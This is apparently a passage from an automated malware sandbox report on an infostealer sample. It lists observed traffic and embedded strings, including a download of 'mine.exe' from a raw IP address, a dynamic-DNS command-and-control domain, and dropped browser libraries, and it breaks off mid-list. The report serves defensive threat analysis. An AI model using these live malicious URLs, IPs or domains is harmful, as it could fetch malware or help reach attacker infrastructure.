Source: global traffic	HTTP traffic detected: GET /steals/mine.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache

Source: MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp

Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: arpdabl.zapto.org

Source: unknown

Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/steals/mine.exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.00000000005D7000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://147.45.44.104/steals/mine.exe1kkkkles
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.00000000005D7000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://147.45.44.104/steals/mine.exea
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://5.0
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	String found in binary or memory: http://64532127VdtSrezylanAPTHSymMatchStringInternetSetOptionAHttpQueryInfoAdbghelp.dllSetThreadCont
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://arp.119.176.241GD
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://arpdabl.DAECIIDGD
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://arpdabl.FCBFHIIDGD
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://arpdabl.zapto
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://arpdabl.zapto.
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://arpdabl.zapto.IDGD
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://arpdabl.zapto.JJDAEContent-Disposition:
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://arpdabl.zapto.org
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.00000000032FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://arpdabl.zapto.org/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://arpdabl.zapto.orgAEC--
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://arpdabl.zapto.orgorm-data;
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://arpdabl.zaptoIIDGD
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://arpdabl.zaptoVWXYZ1234567890isposition:
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1896738110.00000000032AF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1994902601.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1896695804.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1896738110.00000000032AF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1994902601.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1994902601.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1896695804.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1994902601.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1896695804.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1896738110.00000000032AF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1994902601.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1896738110.00000000032AF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1994902601.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1896695804.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1896738110.00000000032AF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1994902601.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1896695804.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1896738110.00000000032AF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1896738110.00000000032AF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1994902601.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1896695804.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: EHDHIDAEHC.exe, 00000004.00000002.2094707680.0000000003EEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/DInvalidGlobalDataContractNamespace
Source: EHDHIDAEHC.exe, 00000004.00000000.2083490533.0000000000602000.00000002.00000001.01000000.00000009.sdmp, mine[1].exe.0.dr, EHDHIDAEHC.exe.0.dr	String found in binary or memory: http://schemas.datacontract.org/2004/07/System
Source: EHDHIDAEHC.exe, 00000004.00000002.2094707680.0000000003EEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/System.Xml
Source: EHDHIDAEHC.exe, 00000004.00000002.2094707680.0000000003EEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/System.Xml.Linq
Source: EHDHIDAEHC.exe, 00000004.00000000.2083490533.0000000000602000.00000002.00000001.01000000.00000009.sdmp, mine[1].exe.0.dr, EHDHIDAEHC.exe.0.dr	String found in binary or memory: http://schemas.datacontract.org/2004/07/dhttp://schemas.datacontract.org/2004/07/System.XmlRhttp://w
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, 